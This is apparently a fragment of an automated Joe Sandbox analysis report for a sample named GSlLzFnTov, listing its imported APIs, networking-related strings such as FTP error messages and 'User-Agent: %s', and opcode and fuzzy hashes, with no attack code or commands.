                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00007FF7F1D9A7A6,?,?,?,?,00007FF7F1D911A7), ref: 00007FF7F1D9A71C
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: fputs$fwrite
                            • String ID:
                            • API String ID: 2206100360-0
                            • Opcode ID: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
                            • Instruction ID: f971ae0e780a787ac93678cb3d6531921446ecfc7be3a840290691693f6ffdc2
                            • Opcode Fuzzy Hash: d90cca3f9f52b75eb44e4aebd10a70a3eef004018b0bccdaa5a65b8deab42047
                            • Instruction Fuzzy Hash: BB31C122A09A9688EF59BF12D404678BB71AB44BE4FC94531CE7E073D4DFACD445C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: free$feofferrorfread
                            • String ID:
                            • API String ID: 1112580154-0
                            • Opcode ID: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
                            • Instruction ID: 377284f067eba82a08c43a0b63219a7e680a1e51873d7e115aa83c425a0ab466
                            • Opcode Fuzzy Hash: 88eb16a64edb0a1782bf3c22edacdb774f5f6a0ba533ae2af922033d424e51c2
                            • Instruction Fuzzy Hash: C5219433A18A8186F764AF11E4403BAA3B0FB98BC9F844530EF9D466C9DFBCD5448790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1D93E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93E89
                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DBC2F3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __stdio_common_vsscanfstrcmp
                            • String ID: %256s "%64[^"]"$.$unlimited
                            • API String ID: 2755920870-3006405630
                            • Opcode ID: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
                            • Instruction ID: 9680fa4ce5dc8d11365e6edf8e9d1e07e4be389b70bad602bce9744aecea5977
                            • Opcode Fuzzy Hash: db51d43b7f1cca94d1fbabe5f87adf4572fb1b03b0003fa92f7bf93387f4e27c
                            • Instruction Fuzzy Hash: 49018862A0D54765EB60E725E4113EAA3E0BF88794FC00232D9BE476D5DF6CD2058750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: inet_pton$_time64
                            • String ID: includesubdomains$max-age=
                            • API String ID: 868955570-1235841791
                            • Opcode ID: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
                            • Instruction ID: a719b6ba1d7e19dfc4050725426d7dc3a83611f28b258f840dba9decc225c287
                            • Opcode Fuzzy Hash: 7b4f4ac11aa12f1fac02e8d9753075ba89dcabaa571770545086b8f4b6c3ed27
                            • Instruction Fuzzy Hash: 6661D311A0D54726EB30EA2998202BAA7B0BF46B94FD85534DDBF073C5CFACE405D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: _scwprintf
                            • String ID: No URL set$User-Agent: %s
                            • API String ID: 1992661772-339178133
                            • Opcode ID: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
                            • Instruction ID: 9aa42aa4afd74234facaafed87be6c8aa242671d9a635d9e41d6bc4081b14a76
                            • Opcode Fuzzy Hash: ecd00fcfe8e6a6c97b516f028ba885befd069a452db79180db5b53cce118799f
                            • Instruction Fuzzy Hash: 9DA13D32708782A6E75CEB25D6802E9E7A4FB08B80F840539D77D43791DFA8B571C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 00007FF7F1DA3014: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,00007FF7F1D910B6), ref: 00007FF7F1DA3026
                            • __swprintf_l.LIBCMT ref: 00007FF7F1D91E4A
                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D91E6E
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: CounterPerformanceQuery__swprintf_lfflush
                            • String ID: %%-%ds %%5.1f%%%%
                            • API String ID: 1637530157-3852588901
                            • Opcode ID: a56a55fe8d58a428a17a0f6b834ab27ede2f4beac54648f5b7925a888f4a79cc
                            • Instruction ID: 81393700961d89929eb32f2bd19c6b928bbc211b1f99480a67703a32dd602a03
                            • Opcode Fuzzy Hash: a56a55fe8d58a428a17a0f6b834ab27ede2f4beac54648f5b7925a888f4a79cc
                            • Instruction Fuzzy Hash: 84612622B0468686DB25EB26E5403BAE7A5EF547D0FC44231DE6D47BC5DFBCE0418740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __swprintf_l.LIBCMT ref: 00007FF7F1DC02B2
                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00000000,00000200,00000000,0000022F,00000200), ref: 00007FF7F1DC035A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l_errno
                            • String ID: %lx
                            • API String ID: 1766030736-1448181948
                            • Opcode ID: 87625db4246a367d9eedabe39b3ecc180280514238f58691ef4228dad3b3b527
                            • Instruction ID: e0e29e0cf0f2e4493d4a3aecaa117e7ce6756d79d5b9619e6abf36e32c9f86e2
                            • Opcode Fuzzy Hash: 87625db4246a367d9eedabe39b3ecc180280514238f58691ef4228dad3b3b527
                            • Instruction Fuzzy Hash: 35515932A0C68246FB319A14A4803B9E3E1BB85744F985A35DDAE536C4DFFED881C7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: Content-Length: %I64d$The file does not exist
                            • API String ID: 1488884202-3816122970
                            • Opcode ID: c10d070390f022191f4fe82a2c769e3a609e3e8c1dbc79cc72eee7241d2a4a27
                            • Instruction ID: a58f395e59c6623468a892e4688841213edc171956fd8e6809d88871c62e0e13
                            • Opcode Fuzzy Hash: c10d070390f022191f4fe82a2c769e3a609e3e8c1dbc79cc72eee7241d2a4a27
                            • Instruction Fuzzy Hash: 0A512A22B18A9242FB24EB1599502B8B3B1EF54BA4FC44231DA7D07FD5DFACF5518390
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID: FTP response aborted due to select/poll error: %d$FTP response timeout
                            • API String ID: 1452528299-4057338436
                            • Opcode ID: b3680c69f4103d06cdb494d06b04e548c44e47966c3d69dd6a1734b33940d799
                            • Instruction ID: 05effd478d3c0f2a8b5fe58a02139f492a107a4554f915a935a661bb3eac92af
                            • Opcode Fuzzy Hash: b3680c69f4103d06cdb494d06b04e548c44e47966c3d69dd6a1734b33940d799
                            • Instruction Fuzzy Hash: 8731D222A0874741FB60AA15A5047BAF3B4BF487D4F844135DE6E476D1DFBCE442C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_lstrncpy
                            • String ID: %s%s%s%s
                            • API String ID: 342294800-8588819
                            • Opcode ID: 7f5fea3136a66fe7532ffc373e6dea4b775f4afa8c4c71feff21b29ebe72a818
                            • Instruction ID: bc2d16d624e677c3cdf19ead471285ed454da899e4945e052346134405eb82b2
                            • Opcode Fuzzy Hash: 7f5fea3136a66fe7532ffc373e6dea4b775f4afa8c4c71feff21b29ebe72a818
                            • Instruction Fuzzy Hash: 4A418421A0CB4692FF19EB54E9402F5A374AF55B89FC40036D96E037E5CFBCE65583A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • recv.WS2_32 ref: 00007FF7F1DB23EE
                            • WSAGetLastError.WS2_32 ref: 00007FF7F1DB2400
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
                              • Part of subcall function 00007FF7F1DAE9C8: __sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
                              • Part of subcall function 00007FF7F1DAE9C8: strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
                              • Part of subcall function 00007FF7F1DAE9C8: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
                              • Part of subcall function 00007FF7F1DAE9C8: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
                              • Part of subcall function 00007FF7F1DAE9C8: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast$_errno$__sys_errlist__sys_nerrrecvstrncpy
                            • String ID: Recv failure: %s
                            • API String ID: 3259516395-4276829032
                            • Opcode ID: 61635ef880cd3c250adacd9e3ce8806d2dce6ae5576a84bf7028612a48018187
                            • Instruction ID: 94fe784321576b5b7d7d91b795278ee6b582756b0d68d865dfecb264970f49f0
                            • Opcode Fuzzy Hash: 61635ef880cd3c250adacd9e3ce8806d2dce6ae5576a84bf7028612a48018187
                            • Instruction Fuzzy Hash: 25419362B1568556EB68EF25E9847B9A360BB58BD5F800235DE2E073D5DFBCE0408350
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: "%s":$"%s":null
                            • API String ID: 1795875747-2759546026
                            • Opcode ID: d1e8b2cbe847eca540a1cdc3be6f99a325edfe1b31fa93f6ff44665a7c6de3bf
                            • Instruction ID: 0049c207d9b78b90955594c540da0d3cb3f6be1c33947876775d751f5590a26d
                            • Opcode Fuzzy Hash: d1e8b2cbe847eca540a1cdc3be6f99a325edfe1b31fa93f6ff44665a7c6de3bf
                            • Instruction Fuzzy Hash: 8C417E21E08642A6FB50EB15D4843B8A3B2AB41784FD88936DA2D477D6DFBCF540C3E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: Failure sending QUIT command: %s$QUIT
                            • API String ID: 1488884202-1162443993
                            • Opcode ID: 8fb780ae27e66ea40ae6cdaa932904c1ed908f10f4f3a2aae22a017b08eb9cd8
                            • Instruction ID: 169c8caa371a587b0b9bf8e8e7e13d5a6ceba2d036380c5ed16132bc5030c395
                            • Opcode Fuzzy Hash: 8fb780ae27e66ea40ae6cdaa932904c1ed908f10f4f3a2aae22a017b08eb9cd8
                            • Instruction Fuzzy Hash: F8313021E0C68681EB54EB21D4543B9B7B0FB44BC9F884135DA2E4B6D5CFADF094C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: %c%03d$%s %s
                            • API String ID: 1488884202-883683383
                            • Opcode ID: e71c8f3416955dffc2b1ae4ce8438465774fe2bbeb44d7f70f04729b0a7ea59a
                            • Instruction ID: 570eb575d9f43c49f7abde5de1c900c4f526dc4d258808de2ce196aff4da5d02
                            • Opcode Fuzzy Hash: e71c8f3416955dffc2b1ae4ce8438465774fe2bbeb44d7f70f04729b0a7ea59a
                            • Instruction Fuzzy Hash: F7212673B14A8986D748DF29E80079C6764E785BC4F989031DE1C4BB94DF38E952CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: htonsinet_pton
                            • String ID: ::1
                            • API String ID: 3877577928-2731173655
                            • Opcode ID: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
                            • Instruction ID: 02107344455e37b7a540a23f78bd9ca89c02c162b3f69b664f193a4371044f0b
                            • Opcode Fuzzy Hash: bc949e856f714609933df4177a66192dda2d0ee264670633a2d5a2a51a43343a
                            • Instruction Fuzzy Hash: 80310433918B85C6E704DF20E440369B3B0FB58B49F948235EA5D4B694DFBDE191CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProcgetsockoptsetsockopt
                            • String ID: @
                            • API String ID: 1224256098-2726393805
                            • Opcode ID: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
                            • Instruction ID: 997566fa20b9d762ff318318b7a652848134893e5a0cad97523f3f1f12d67d79
                            • Opcode Fuzzy Hash: 5f442fb243eeb454093095dbadaed06eb23a4c4b725bf5fe417a39eceb628cc1
                            • Instruction Fuzzy Hash: A0119E71A0C642A7F320EF14E444366F7B0FB84345F940134EA9A466E9DBFDD544CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: __swprintf_l
                            • String ID: AUTH %s$AUTH %s %s
                            • API String ID: 1488884202-306427787
                            • Opcode ID: b9c67204038dda0fd5d669baa53048a35a4c7edabb4fc997b8899f6f7eaac06f
                            • Instruction ID: 6419d21a397dc55cc4ca5e592e1df9decb1688801a5960cb292131e99498ce39
                            • Opcode Fuzzy Hash: b9c67204038dda0fd5d669baa53048a35a4c7edabb4fc997b8899f6f7eaac06f
                            • Instruction Fuzzy Hash: 7DE08CA1E09B5181EF44B74898013A85370AF147C9FD0803ACA5D123E1DF7CE2A5C7D5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F1DEC509,?,?,?,?,00007FF7F1DEC2FD,?,?,?,?,00007FF7F1DEBAE6), ref: 00007FF7F1DEC53B
                            • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F1DEC509,?,?,?,?,00007FF7F1DEC2FD,?,?,?,?,00007FF7F1DEBAE6), ref: 00007FF7F1DEC5C2
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: c41bca59b6dd596f70c16ed48ea2d7c7a1d9c565bfa0111b8186407d51e17b50
                            • Instruction ID: 666bd12c26028b3ca8fa6aeeb4dc33c41653270c5d2ceb3c41c445ee69703566
                            • Opcode Fuzzy Hash: c41bca59b6dd596f70c16ed48ea2d7c7a1d9c565bfa0111b8186407d51e17b50
                            • Instruction Fuzzy Hash: C5113D61E1D70246FB6CB7219840179A2A1AF44BE2FD88634D93E173D5DFACF84187E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F1D9B6E1), ref: 00007FF7F1DA2BAB
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F1D9B6E1), ref: 00007FF7F1DA2BC2
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,00007FF7F1D9B6E1), ref: 00007FF7F1DA2BE3
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2BF4
                            Memory Dump Source
                            • Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true
                            • Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
                            • Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd
